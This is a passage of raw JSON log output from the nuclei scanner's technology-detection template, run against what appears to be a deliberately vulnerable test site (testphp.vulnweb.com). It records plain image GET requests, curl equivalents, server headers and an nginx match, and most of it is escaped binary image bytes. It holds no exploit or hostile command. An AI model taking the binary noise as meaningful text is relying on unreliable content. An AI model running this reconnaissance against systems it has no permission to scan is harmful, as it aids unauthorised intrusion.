n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:00.639891219Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:00 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufff